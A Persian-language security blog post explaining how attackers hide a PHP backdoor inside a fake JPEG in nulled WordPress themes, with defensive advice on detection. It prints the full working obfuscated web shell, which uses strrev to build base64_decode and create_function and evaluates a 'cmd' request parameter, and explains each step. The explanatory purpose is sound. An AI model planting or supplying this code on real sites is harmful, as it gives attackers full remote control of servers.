ساخت بکدور با استفاده از عکس جعلی


اکثرا هکر ها پس از هک کردن وب سایت مورد نظرشان در آن یک یا چند بکدور قرار می دهند تا درصورتی که بعدا خواستند دوباره آن وب سایت را هک کنند کار راحتی داشته باشند . بررسی ها نشان می دهد که بیش از ۷۰% وب سایت هایی که هک می شوند پس از هک شدن به آن ها بکدور تزریق می شود. در این پست به بررسی نحوه ساخت بکدور توسط هکر ها می پردازیم و یکی از متود های آن را هم تشریح می کنیم .

بکدور چیست؟

بکدور یا درب پشتی یک نوع بدافزار می باشد که این امکان را به هکر ها می دهد تا بدون وارد کردن نام کاربری یا گرفتن دسترسی از سرور به راحتی آن ها را دور زده و بدون اعتبار سنجی ، سایت یا سرور را کنترل کنند.

چگونه  از بکدور ها در امان بمانیم؟

در صورتی که از سیستم مدیریت محتوای وردپرس استفاده می کنید می توانید با نصب افزونه های امنیتی مثل wordfence یا ithemes security یا sucuri تا حد زیادی بکدور ها را شناسایی کنید چرا که این افزونه فایل های قالب ها و افزونه های شما را با فایل های اصلی آن مقایسه می کنند و درصورتی که تناقضی ببینند آن را گزارش می کنند و اگر هم از سیستم های مدیریت محتوای دیگر استفاده می کنید می توانید از افزونه های امنیتی آن ها استفاده کنید و یا با نصب یک فایروال خوب در سرور به راحتی کل سرور را اسکن نمایید. به علاوه ما پیشنهاد می کنیم که به هیچ وجه از قالب های نال شده استفاده نکنید زیرا در اکثر موارد دیده شده در این قالب ها بکدور های زیادی وجود دارد

بکدور ها در چه قسمتی از سایت من می توانند قرار گیرند؟

بکدور ها می توانند بسیار خلاقانه باشند و در هر قسمت از سایت شما مثل دیتابیس ها , فایل های تم ها , پنل ادمین و … تزریق شوند برای همین تشخیص بکدور ها در مواردی بسیار سخت می باشد و آموزش پیدا کردن آن ها بسیار زمان گیر است . برای همین در این پست فقط به بررسی یک مورد از روش های جدید و خلاقانه ساخت بکدور بسنده می کنیم .

بکدور در عکس جعلی

در این روش هکر مورد نظر یک عکس جعلی یا فیک ایجاد می کند و کد های خود را درون آن به نحوی که حتی وقتی آن را ببینید متوجه کد های مخرب آن نشوید می گذارد

فرض کنید شما یک قالب جدید نال شده برای سایت وردپرسی خود دانلود کرده ایید و وقتی آن را نصب می کنید در پوشه عکس های قالب متوجه وجود یک فایل به اسم x.php می شوید وقتی این فایل را باز می کنید با کد زیر مواجه می شوید:

<?php include("background.jpg");?>

در نگاه اولیه تنها یک عکس فراخوانی می شود اما وقتی به آدرس

http://mysite.com/wp-content/themes/some-theme/img/background.jpg

می رویم انگار عکس مورد نظر خراب است و در مرورگر باز نمی شود برای همین فایل background.jpg را با یک تکست ادیتور باز می کنیم و متوجه این کد ها درون آن می شویم :

<?php
$imgCode = 'QGV2YWwoQCRfR0VUWyJjbWQiXSk7';
$imgName = strrev("esab")."64_".strrev("edoced");
$imgS = $imgName("ZXZhbChiYXNlNjRfZGVjb2RlKCRpbWdDb2RlKSk7");
$createImg = strrev("taerc")."e_f".strrev("noitcnu");
$c = $createImg('$imgCode', $imgS);
$c($imgCode);
?>

در نگاه اول شاید این کد ها هم خیلی خطرناک بنظر نیایند ولی پس از کمی بررسی متوجه خواهید شد که نفوذگر به صورت خلاقانه بکدور خود را با تابع strrev می سازد و به راحتی از سرور شما دسترسی می گیرد  .

این اسکریپت با استفاده از این مراحل ساده دسترسی کامل سایت شما را به نفوذگر می دهد :

  • متغییر imgCode شامل یک کد ساده مخرب می باشد که از قبل هکر آن را به صورت base64 درآورده است تا شما در اولین نگاه آن را نبینید
  • متغییر imgName با استفاده از تابع strrev تابع base64_decode را می سازد
  • و متغییر mgS وقتی با تابع base64_decode دیکود شود شامل کد هایی است که کد های مخرب imgCode را در سرور شما اجرا می کند که به این صورت می باشد
1eval(base64_decode($imgCode));
  • متغییر createImg هم که تابع create function را با strrev به صورت برعکس نوشته
  • و در نهایت متغییر c کد های بکدور را به صورت یک تابع در می آورد و آن ها را فراخوانی میکند

این نمونه ایی که در این پست مثال زدیم یکی از جدید ترین شیوه های هکر ها برای ساخت بکدور می باشد که که گزارش شده است . در صورتی که سوالی داشتید می توانید زیر همین پست مطرح کنید

لینک پست در تیم امنیتی گارد ایران